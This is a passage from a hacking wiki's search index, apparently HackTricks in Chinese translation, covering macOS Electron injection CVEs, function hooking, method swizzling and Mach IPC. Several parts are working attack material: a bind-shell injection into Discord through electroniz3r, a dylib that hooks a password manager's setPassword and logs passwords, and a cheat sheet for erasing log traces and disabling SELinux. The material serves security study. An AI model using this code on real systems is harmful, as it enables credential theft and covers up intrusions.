(2023-2024)","id":"2380","title":"Notable Electron macOS Vulnerabilities (2023-2024)"},"2381":{"body":"Electron ≤22.3.23 和各种 23-27 预发布版本允许具有写入权限的攻击者绕过 embeddedAsarIntegrityValidation 和 onlyLoadAppFromAsar 保护。该漏洞是完整性检查器中的 文件类型混淆 ,使得一个精心制作的 名为 app.asar 的目录 被加载,而不是经过验证的归档,因此放置在该目录中的任何 JavaScript 在应用程序启动时都会被执行。因此,即使是遵循了加固指导并启用了这两个保护的供应商,在 macOS 上仍然存在漏洞。 已修补的 Electron 版本: 22.3.24 、 24.8.3 、 25.8.1 、 26.2.1 和 27.0.0-alpha.7 。发现运行旧版本应用程序的攻击者可以用自己的目录覆盖 Contents/Resources/app.asar,以使用应用程序的 TCC 权限执行代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » CVE-2023-44402 – ASAR integrity bypass","id":"2381","title":"CVE-2023-44402 – ASAR integrity bypass"},"2382":{"body":"在 2024 年 1 月,一系列 CVE(CVE-2024-23738 至 CVE-2024-23743)突显出许多 Electron 应用程序仍然启用了 RunAsNode 和 EnableNodeCliInspectArguments 保护。因此,本地攻击者可以通过环境变量 ELECTRON_RUN_AS_NODE=1 或标志如 --inspect-brk 重新启动程序,将其转变为 通用 Node.js 进程,并继承所有应用程序的沙箱和 TCC 权限。 尽管 Electron 团队对“关键”评级提出异议,并指出攻击者已经需要本地代码执行,但该问题在后期利用中仍然有价值,因为它将任何易受攻击的 Electron 包转变为 living-off-the-land 二进制文件,例如可以读取联系人、照片或其他先前授予桌面应用程序的敏感资源。 Electron 维护者的防御指导: 在生产版本中禁用 RunAsNode 和 EnableNodeCliInspectArguments 保护。 如果您的应用程序确实需要辅助 Node.js 进程,请使用更新的 UtilityProcess API,而不是重新启用这些保护。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » 2024 “RunAsNode” / “enableNodeCliInspectArguments” CVE cluster","id":"2382","title":"2024 “RunAsNode” / “enableNodeCliInspectArguments” CVE cluster"},"2383":{"body":"electroniz3r 工具 electroniz3r 可以轻松用于 查找已安装的易受攻击的 Electron 应用程序 并在其上注入代码。该工具将尝试使用 --inspect 技术: 您需要自己编译它,可以这样使用: bash # Find electron apps\\n./electroniz3r list-apps ╔══════════════════════════════════════════════════════════════════════════════════════════════════════╗\\n║ Bundle identifier │ Path ║\\n╚──────────────────────────────────────────────────────────────────────────────────────────────────────╝\\ncom.microsoft.VSCode /Applications/Visual Studio Code.app\\norg.whispersystems.signal-desktop /Applications/Signal.app\\norg.openvpn.client.app /Applications/OpenVPN Connect/OpenVPN Connect.app\\ncom.neo4j.neo4j-desktop /Applications/Neo4j Desktop.app\\ncom.electron.dockerdesktop /Applications/Docker.app/Contents/MacOS/Docker Desktop.app\\norg.openvpn.client.app /Applications/OpenVPN Connect/OpenVPN Connect.app\\ncom.github.GitHubClient /Applications/GitHub Desktop.app\\ncom.ledger.live /Applications/Ledger Live.app\\ncom.postmanlabs.mac /Applications/Postman.app\\ncom.tinyspeck.slackmacgap /Applications/Slack.app\\ncom.hnc.Discord /Applications/Discord.app # Check if an app has vulenrable fuses vulenrable\\n## It will check it by launching the app with the param \\"--inspect\\" and checking if the port opens\\n/electroniz3r verify \\"/Applications/Discord.app\\" /Applications/Discord.app started the debug WebSocket server\\nThe application is vulnerable!\\nYou can now kill the app using `kill -9 57739` # Get a shell inside discord\\n## For more precompiled-scripts check the code\\n./electroniz3r inject \\"/Applications/Discord.app\\" --predefined-script bindShell /Applications/Discord.app started the debug WebSocket server\\nThe webSocketDebuggerUrl is: ws://127.0.0.1:13337/8e0410f0-00e8-4e0e-92e4-58984daf37e5\\nShell binding requested. Check `nc 127.0.0.1 12345` https://github.com/boku7/Loki Loki 旨在通过用 Loki 命令与控制 JavaScript 文件替换应用程序的 JavaScript 文件来对 Electron 应用程序进行后门攻击。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » Automatic Injection","id":"2383","title":"Automatic Injection"},"2384":{"body":"https://www.electronjs.org/docs/latest/tutorial/fuses https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks https://github.com/electron/electron/security/advisories/GHSA-7m48-wc93-9g85 https://www.electronjs.org/blog/statement-run-as-node-cves https://m.youtube.com/watch?v=VWQY5R2A6X8 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Electron Applications Injection » References","id":"2384","title":"References"},"2385":{"body":"Reading time: 12 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » macOS 函数钩子","id":"2385","title":"macOS 函数钩子"},"2386":{"body":"创建一个 dylib ,并包含一个 __interpose (__DATA___interpose) 部分(或一个标记为 S_INTERPOSING 的部分),其中包含指向 原始 和 替代 函数的 函数指针 元组。 然后,使用 DYLD_INSERT_LIBRARIES 注入 dylib(插入需要在主应用加载之前发生)。显然,适用于 DYLD_INSERT_LIBRARIES 使用的 限制 在这里也适用 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 函数插入","id":"2386","title":"函数插入"},"2387":{"body":"interpose.c\\nhello.c\\ninterpose2.c interpose.c\\" overflow=\\"wrap // gcc -dynamiclib interpose.c -o interpose.dylib\\n#include \\n#include int my_printf(const char *format, ...) {\\n//va_list args;\\n//va_start(args, format);\\n//int ret = vprintf(format, args);\\n//va_end(args); int ret = printf(\\"Hello from interpose\\\\n\\");\\nreturn ret;\\n} __attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf\\n__attribute__ ((section (\\"__DATA,__interpose\\"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf }; c //gcc hello.c -o hello\\n#include int main() {\\nprintf(\\"Hello World!\\\\n\\");\\nreturn 0;\\n} c // Just another way to define an interpose\\n// gcc -dynamiclib interpose2.c -o interpose2.dylib #include #define DYLD_INTERPOSE(_replacement, _replacee) \\\\\\n__attribute__((used)) static struct { \\\\\\nconst void* replacement; \\\\\\nconst void* replacee; \\\\\\n} _interpose_##_replacee __attribute__ ((section(\\"__DATA, __interpose\\"))) = { \\\\\\n(const void*) (unsigned long) &_replacement, \\\\\\n(const void*) (unsigned long) &_replacee \\\\\\n}; int my_printf(const char *format, ...)\\n{\\nint ret = printf(\\"Hello from interpose\\\\n\\");\\nreturn ret;\\n} DYLD_INTERPOSE(my_printf,printf); bash DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello\\nHello from interpose DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello\\nHello from interpose warning DYLD_PRINT_INTERPOSTING 环境变量可用于调试插入,并将打印插入过程。 还要注意, 插入发生在进程和加载的库之间 ,它不适用于共享库缓存。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 插入 printf","id":"2387","title":"插入 printf"},"2388":{"body":"现在也可以使用 dyld_dynamic_interpose 动态插入一个函数。这允许在运行时以编程方式插入一个函数,而不是仅仅从一开始就这样做。 只需指明 要替换的函数和替换函数的元组 。 c struct dyld_interpose_tuple {\\nconst void* replacement;\\nconst void* replacee;\\n};\\nextern void dyld_dynamic_interpose(const struct mach_header* mh,\\nconst struct dyld_interpose_tuple array[], size_t count);","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 动态插入","id":"2388","title":"动态插入"},"2389":{"body":"在 ObjectiveC 中,方法调用的方式是: [myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2] 需要 对象 、 方法 和 参数 。当调用一个方法时,使用函数 objc_msgSend 发送 msg :int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2); 对象是 someObject ,方法是 @selector(method1p1:p2:) ,参数是 value1 , value2 。 根据对象结构,可以访问一个 方法数组 ,其中 名称 和 指向方法代码的指针 被 存放 。 caution 请注意,由于方法和类是基于其名称访问的,因此这些信息存储在二进制文件中,因此可以使用 otool -ov 或 class-dump 来检索。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 方法交换","id":"2389","title":"方法交换"},"239":{"body":"通道 传输 解码 说明 ICMP – EchoBackdoor ICMP Echo Req/Rep 4-byte key + 14-byte chunks (XOR) 纯被动监听器,无外发流量 DNS – NoDepDNS UDP 53 XOR (key = funnyAndHappy) encoded in A-record octets 监控 *.nodep 子域名 GTP – GTPDoor UDP 2123 AES-128-CBC blob in private IE 与合法的 GTP-C 通信混合 All implants implement watchdogs that timestomp their binaries and re-spawn if crashed.","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 5. 隐蔽通道","id":"239","title":"5. 隐蔽通道"},"2390":{"body":"可以访问方法的信息,例如名称、参数数量或地址,如以下示例所示: objectivec // gcc -framework Foundation test.m -o test #import \\n#import \\n#import int main() {\\n// Get class of the variable\\nNSString* str = @\\"This is an example\\";\\nClass strClass = [str class];\\nNSLog(@\\"str\'s Class name: %s\\", class_getName(strClass)); // Get parent class of a class\\nClass strSuper = class_getSuperclass(strClass);\\nNSLog(@\\"Superclass name: %@\\",NSStringFromClass(strSuper)); // Get information about a method\\nSEL sel = @selector(length);\\nNSLog(@\\"Selector name: %@\\", NSStringFromSelector(sel));\\nMethod m = class_getInstanceMethod(strClass,sel);\\nNSLog(@\\"Number of arguments: %d\\", method_getNumberOfArguments(m));\\nNSLog(@\\"Implementation address: 0x%lx\\", (unsigned long)method_getImplementation(m)); // Iterate through the class hierarchy\\nNSLog(@\\"Listing methods:\\");\\nClass currentClass = strClass;\\nwhile (currentClass != NULL) {\\nunsigned int inheritedMethodCount = 0;\\nMethod* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount); NSLog(@\\"Number of inherited methods in %s: %u\\", class_getName(currentClass), inheritedMethodCount); for (unsigned int i = 0; i < inheritedMethodCount; i++) {\\nMethod method = inheritedMethods[i];\\nSEL selector = method_getName(method);\\nconst char* methodName = sel_getName(selector);\\nunsigned long address = (unsigned long)method_getImplementation(m);\\nNSLog(@\\"Inherited method name: %s (0x%lx)\\", methodName, address);\\n} // Free the memory allocated by class_copyMethodList\\nfree(inheritedMethods);\\ncurrentClass = class_getSuperclass(currentClass);\\n} // Other ways to call uppercaseString method\\nif([str respondsToSelector:@selector(uppercaseString)]) {\\nNSString *uppercaseString = [str performSelector:@selector(uppercaseString)];\\nNSLog(@\\"Uppercase string: %@\\", uppercaseString);\\n} // Using objc_msgSend directly\\nNSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString));\\nNSLog(@\\"Uppercase string: %@\\", uppercaseString2); // Calling the address directly\\nIMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address\\nNSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp\\nNSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method\\nNSLog(@\\"Uppercase string: %@\\", uppercaseString3); return 0;\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 访问原始方法","id":"2390","title":"访问原始方法"},"2391":{"body":"函数 method_exchangeImplementations 允许 更改 一个函数的实现地址为另一个函数的实现地址 。 caution 因此,当调用一个函数时, 执行的是另一个函数 。 objectivec //gcc -framework Foundation swizzle_str.m -o swizzle_str #import \\n#import // Create a new category for NSString with the method to execute\\n@interface NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (SwizzleString) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {\\nNSLog(@\\"Custom implementation of substringFromIndex:\\"); // Call the original method\\nreturn [self swizzledSubstringFromIndex:from];\\n} @end int main(int argc, const char * argv[]) {\\n// Perform method swizzling\\nMethod originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));\\nMethod swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));\\nmethod_exchangeImplementations(originalMethod, swizzledMethod); // We changed the address of one method for the other\\n// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex\\n// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled // Example usage\\nNSString *myString = @\\"Hello, World!\\";\\nNSString *subString = [myString substringFromIndex:7];\\nNSLog(@\\"Substring: %@\\", subString); return 0;\\n} warning 在这种情况下,如果 合法 方法的 实现代码 对 方法 的 名称 进行 验证 ,它可能会 检测到 这种交换并阻止其运行。 以下技术没有这个限制。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » Method Swizzling with method_exchangeImplementations","id":"2391","title":"Method Swizzling with method_exchangeImplementations"},"2392":{"body":"之前的格式很奇怪,因为你正在将两个方法的实现互相更改。使用函数 method_setImplementation ,你可以 更改 一个 方法的实现为另一个 。 只需记住,如果你打算在覆盖之前从新实现中调用原始实现,请 存储原始实现的地址 ,因为稍后定位该地址会更加复杂。 objectivec #import \\n#import \\n#import static IMP original_substringFromIndex = NULL; @interface NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from; @end @implementation NSString (Swizzlestring) - (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {\\nNSLog(@\\"Custom implementation of substringFromIndex:\\"); // Call the original implementation using objc_msgSendSuper\\nreturn ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);\\n} @end int main(int argc, const char * argv[]) {\\n@autoreleasepool {\\n// Get the class of the target method\\nClass stringClass = [NSString class]; // Get the swizzled and original methods\\nMethod originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:)); // Get the function pointer to the swizzled method\'s implementation\\nIMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:))); // Swap the implementations\\n// It return the now overwritten implementation of the original method to store it\\noriginal_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP); // Example usage\\nNSString *myString = @\\"Hello, World!\\";\\nNSString *subString = [myString substringFromIndex:7];\\nNSLog(@\\"Substring: %@\\", subString); // Set the original implementation back\\nmethod_setImplementation(originalMethod, original_substringFromIndex); return 0;\\n}\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 使用 method_setImplementation 进行方法交换","id":"2392","title":"使用 method_setImplementation 进行方法交换"},"2393":{"body":"在本页中讨论了不同的函数钩取方法。然而,它们涉及到 在进程内部运行代码进行攻击 。 为了做到这一点,最简单的技术是通过环境变量或劫持来注入一个 Dyld 。不过,我想这也可以通过 Dylib进程注入 来完成。 然而,这两种选项都 限制 于 未保护 的二进制文件/进程。检查每种技术以了解更多关于限制的信息。 然而,函数钩取攻击是非常具体的,攻击者会这样做以 从进程内部窃取敏感信息 (否则你只会进行进程注入攻击)。而这些敏感信息可能位于用户下载的应用程序中,例如MacPass。 因此,攻击者的途径是找到一个漏洞或去掉应用程序的签名,通过应用程序的Info.plist注入**DYLD_INSERT_LIBRARIES**环境变量,添加类似于: xml LSEnvironment\\n\\nDYLD_INSERT_LIBRARIES\\n/Applications/Application.app/Contents/malicious.dylib\\n 然后 重新注册 该应用程序: bash /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app 在该库中添加钩子代码以提取信息:密码、消息... caution 请注意,在较新版本的 macOS 中,如果您 去除应用程序二进制文件的签名 ,并且它之前已被执行,macOS 将不再执行该应用程序 。 库示例 objectivec // gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib // If you added env vars in the Info.plist don\'t forget to call lsregister as explained before // Listen to the logs with something like:\\n// log stream --style syslog --predicate \'eventMessage CONTAINS[c] \\"Password\\"\' #include \\n#import // Here will be stored the real method (setPassword in this case) address\\nstatic IMP real_setPassword = NULL; static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)\\n{\\n// Function that will log the password and call the original setPassword(pass, file_path) method\\nNSLog(@\\"[+] Password is: %@\\", password); // After logging the password call the original method so nothing breaks.\\nreturn ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL);\\n} // Library constructor to execute\\n__attribute__((constructor))\\nstatic void customConstructor(int argc, const char **argv) {\\n// Get the real method address to not lose it\\nClass classMPDocument = NSClassFromString(@\\"MPDocument\\");\\nMethod real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:)); // Make the original method setPassword call the fake implementation one\\nIMP fake_IMP = (IMP)custom_setPassword;\\nreal_setPassword = method_setImplementation(real_Method, fake_IMP);\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » Hooking Attack Methodology","id":"2393","title":"Hooking Attack Methodology"},"2394":{"body":"https://nshipster.com/method-swizzling/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Function Hooking » 参考","id":"2394","title":"参考"},"2395":{"body":"Reading time: 45 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » macOS IPC - 进程间通信","id":"2395","title":"macOS IPC - 进程间通信"},"2396":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » Mach 通过端口进行消息传递","id":"2396","title":"Mach 通过端口进行消息传递"},"2397":{"body":"Mach 使用 任务 作为共享资源的 最小单位 ,每个任务可以包含 多个线程 。这些 任务和线程与 POSIX 进程和线程 1:1 映射 。 任务之间的通信通过 Mach 进程间通信 (IPC) 进行,利用单向通信通道。 消息在端口之间传输 ,这些端口充当由内核管理的 消息队列 。 端口 是 Mach IPC 的 基本 元素。它可以用来 发送和接收 消息。 每个进程都有一个 IPC 表 ,在其中可以找到 进程的 mach 端口 。mach 端口的名称实际上是一个数字(指向内核对象的指针)。 一个进程还可以将一个端口名称和一些权限 发送给不同的任务 ,内核会在 另一个任务的 IPC 表 中显示这个条目。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 基本信息","id":"2397","title":"基本信息"},"2398":{"body":"端口权限定义了任务可以执行的操作,是这种通信的关键。可能的 端口权限 是 ( 定义来自这里 ): 接收权限 ,允许接收发送到端口的消息。Mach 端口是 MPSC(多个生产者,单个消费者)队列,这意味着在整个系统中每个端口只能有 一个接收权限 (与管道不同,多个进程可以持有一个管道的读端文件描述符)。 拥有 接收权限 的任务可以接收消息并 创建发送权限 ,允许其发送消息。最初只有 自己的任务对其端口拥有接收权限 。 如果接收权限的拥有者 死亡 或被杀死, 发送权限将变得无用(死名称) 。 发送权限 ,允许向端口发送消息。 发送权限可以被 克隆 ,因此拥有发送权限的任务可以克隆该权限并 授予给第三个任务 。 请注意, 端口权限 也可以通过 Mac 消息 传递 。 一次性发送权限 ,允许向端口发送一条消息,然后消失。 该权限 不能 被 克隆 ,但可以被 移动 。 端口集权限 ,表示一个 端口集 而不是单个端口。从端口集中出队一条消息会从其包含的一个端口中出队一条消息。端口集可以用来同时监听多个端口,类似于 Unix 中的 select/poll/epoll/kqueue。 死名称 ,这不是一个实际的端口权限,而仅仅是一个占位符。当一个端口被销毁时,所有现有的对该端口的端口权限都会变成死名称。 任务可以将发送权限转移给其他任务 ,使其能够发送消息。 发送权限也可以被克隆,因此一个任务可以复制并将权限授予第三个任务 。这与一个称为 引导服务器 的中介进程结合,使任务之间的有效通信成为可能。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 端口权限","id":"2398","title":"端口权限"},"2399":{"body":"文件端口允许在 Mac 端口中封装文件描述符(使用 Mach 端口权限)。可以使用 fileport_makeport 从给定的 FD 创建一个 fileport,并使用 fileport_makefd 从 fileport 创建一个 FD。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 文件端口","id":"2399","title":"文件端口"},"24":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Methodology » Pentesting Methodology","id":"24","title":"Pentesting Methodology"},"240":{"body":"bash # Remove attacker IPs from wtmp\\nutmpdump /var/log/wtmp | sed \'/203\\\\.0\\\\.113\\\\.66/d\' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp # Disable bash history\\nexport HISTFILE=/dev/null # Masquerade as kernel thread\\necho 0 > /proc/$$/autogroup # hide from top/htop\\nprintf \'\\\\0\' > /proc/$$/comm # appears as [kworker/1] touch -r /usr/bin/time /usr/bin/chargen # timestomp\\nsetenforce 0 # disable SELinux","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 6. 防御规避 速查表","id":"240","title":"6. 防御规避 速查表"},"2400":{"body":"如前所述,可以使用 Mach 消息发送权限,然而,您 不能在没有发送 Mach 消息的权限的情况下发送权限 。那么,如何建立第一次通信呢? 为此, 引导服务器 (在 mac 中为 launchd )参与其中,因为 任何人都可以获得引导服务器的发送权限 ,可以请求它发送消息到另一个进程的权限: 任务 A 创建一个 新端口 ,获得该端口的 接收权限 。 任务 A ,作为接收权限的持有者, 为该端口生成一个发送权限 。 任务 A 与 引导服务器 建立 连接 ,并 将其为最初生成的端口发送的发送权限 发送给它。 请记住,任何人都可以获得引导服务器的发送权限。 任务 A 向引导服务器发送 bootstrap_register 消息,以 将给定端口与名称关联 ,如 com.apple.taska。 任务 B 与 引导服务器 交互以执行服务名称的引导 查找 (bootstrap_lookup)。因此,引导服务器可以响应,任务 B 将在查找消息中发送一个 发送权限到它之前创建的端口 。如果查找成功, 服务器将复制从任务 A 接收到的发送权限 并 传输给任务 B 。 请记住,任何人都可以获得引导服务器的发送权限。 通过这个发送权限, 任务 B 能够 发送 一条 消息 给任务 A 。 对于双向通信,通常任务 B 会生成一个带有 接收 权限和 发送 权限的新端口,并将 发送权限授予任务 A ,以便它可以向任务 B 发送消息(双向通信)。 引导服务器 无法验证 任务声称的服务名称。这意味着一个 任务 可能会 冒充任何系统任务 ,例如虚假 声称一个授权服务名称 ,然后批准每个请求。 然后,Apple 将 系统提供的服务名称 存储在安全配置文件中,位于 SIP 保护 的目录中:/System/Library/LaunchDaemons 和 /System/Library/LaunchAgents。每个服务名称旁边, 相关的二进制文件也被存储 。引导服务器将为这些服务名称创建并持有 接收权限 。 对于这些预定义的服务, 查找过程略有不同 。当查找服务名称时,launchd 动态启动该服务。新的工作流程如下: 任务 B 启动对服务名称的引导 查找 。 launchd 检查任务是否正在运行,如果没有,则 启动 它。 任务 A (服务)执行 引导签到 (bootstrap_check_in())。在这里, 引导 服务器创建一个发送权限,保留它,并 将接收权限转移给任务 A 。 launchd 复制 发送权限并将其发送给任务 B 。 任务 B 生成一个带有 接收 权限和 发送 权限的新端口,并将 发送权限授予任务 A (服务),以便它可以向任务 B 发送消息(双向通信)。 然而,这个过程仅适用于预定义的系统任务。非系统任务仍然按照最初描述的方式操作,这可能会允许冒充。 caution 因此,launchd 永远不应崩溃,否则整个系统将崩溃。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS IPC - Inter Process Communication » 建立通信","id":"2400","title":"建立通信"},"2401":{"body":"在这里找到更多信息 mach_msg 函数,基本上是一个系统调用,用于发送和接收 Mach 消息。该函数要求将要发送的消息作为初始参数。此消息必须以 mach_msg_header_t 结构开始,后面跟着实际的消息内容。该结构定义如下: c typedef struct {\\nmach_msg_bits_t msgh_bits;\\nmach_msg_size_t msgh_size;\\nmach_port_t msgh_remote_port;\\nmach_port_t msgh_local_port;\\nmach_port_name_t msgh_voucher_port;\\nmach_msg_id_t msgh_id;\\n} mach_msg_header_t; 进程拥有 接收权 可以在 Mach 端口上接收消息。相反, 发送者 被授予 发送 或 一次性发送权 。一次性发送权专门用于发送单个消息,之后它将失效。 初始字段 msgh_bits 是一个位图: 第一个位(最重要的位)用于指示消息是否复杂(下面会详细说明) 第 3 位和第 4 位由内核使用 第二个字节的 5 个最低有效位 可用于 凭证 :另一种发送键/值组合的端口类型。 第三个字节的 5 个最低有效位 可用于 本地端口 第四个字节的 5 个最低有效位 可用于 远程端口 可以在凭证、本地和远程端口中指定的类型是(来自 mach/message.h ): c #define MACH_MSG_TYPE_MOVE_RECEIVE 16 /* Must hold receive right */\\n#define MACH_MSG_TYPE_MOVE_SEND 17 /* Must hold send right(s) */\\n#define MACH_MSG_TYPE_MOVE_SEND_ONCE 18 /* Must hold sendonce right */\\n#define MACH_MSG_TYPE_COPY_SEND 19 /* Must hold send right(s) */\\n#define MACH_MSG_TYPE_MAKE_SEND 20 /* Must hold receive right */\\n#define MACH_MSG_TYPE_MAKE_SEND_ONCE 21 /* Must hold receive right */\\n#define MACH_MSG_TYPE_COPY_RECEIVE 22 /* NOT VALID */\\n#define MACH_MSG_TYPE_DISPOSE_RECEIVE 24 /* must hold receive right */\\n#define MACH_MSG_TYPE_DISPOSE_SEND 25 /* must hold send right(s) */\\n#define MACH_MSG_TYPE_DISPOSE_SEND_ONCE 26 /* must hold sendonce right */ 例如,MACH_MSG_TYPE_MAKE_SEND_ONCE 可用于 指示 应该为此端口派生并转移一个 一次性发送权 。也可以指定 MACH_PORT_NULL 以防止接收者能够回复。 为了实现简单的 双向通信 ,进程可以在 mach 消息头 中指定一个 mach 端口 ,称为 回复端口 ( msgh_local_port ),接收该消息的 接收者 可以 发送回复 。 tip 请注意,这种双向通信用于期望回复的 XPC 消息中(xpc_connection_send_message_with_reply 和 xpc_connection_send_message_with_reply_sync)。但 通常会创建不同的端口 ,如前所述,以创建双向通信。 消息头的其他字段包括: msgh_size: 整个数据包的大小。 msgh_remote_port: 发送此消息的端口。 msgh_voucher_port: mach 代金券 。 msgh_id: 此消息的 ID,由接收者解释。 caution 请注意, mach 消息是通过 mach port 发送的 ,这是一个 单接收者 、 多个发送者 的通信通道,内置于 mach 内核中。 多个进程 可以 向 mach 端口发送消息 ,但在任何时候只有 一个进程可以从中读取 。 消息由 mach_msg_header_t 头部、 主体 和 尾部 (如果有的话)组成,并且可以授予回复的权限。在这些情况下,内核只需将消息从一个任务传递到另一个任务。 尾部 是 内核添加到消息的信息 (用户无法设置),可以在消息接收时使用标志 MACH_RCV_TRAILER_ 请求(可以请求不同的信息)。 复杂消息 然而,还有其他更 复杂 的消息,例如传递额外端口权或共享内存的消息,在这些情况下,内核还需要将这些对象发送给接收者。在这种情况下,头部的最显著位 msgh_bits 被设置。 可以传递的可能描述符在 mach/message.h 中定义: c #define MACH_MSG_PORT_DESCRIPTOR 0\\n#define MACH_MSG_OOL_DESCRIPTOR 1\\n#define MACH_MSG_OOL_PORTS_DESCRIPTOR 2\\n#define MACH_MSG_OOL_VOLATILE_DESCRIPTOR 3\\n#define MACH_MSG_GUARDED_PORT_DESCRIPTOR 4 #pragma pack(push, 4) typedef struct{\\nnatural_t pad1;\\nmach_msg_size_t pad2;\\nunsigned int pad3 : 24;\\nmach_msg_descriptor_type_t type : 8;\\n} mach_msg_type_descriptor_t; 在32位中,所有描述符都是12B,描述符类型在第11个字节中。在64位中,大小各不相同。 caution 内核会将描述符从一个任务复制到另一个任务,但首先 在内核内存中创建一个副本 。这种技术被称为“风水”,在多个漏洞中被滥用,以使 内核在其内存中复制数据 ,使一个进程将描述符发送给自己。然后,该进程可以接收消息(内核会释放它们)。 也可以 将端口权限发送到一个易受攻击的进程 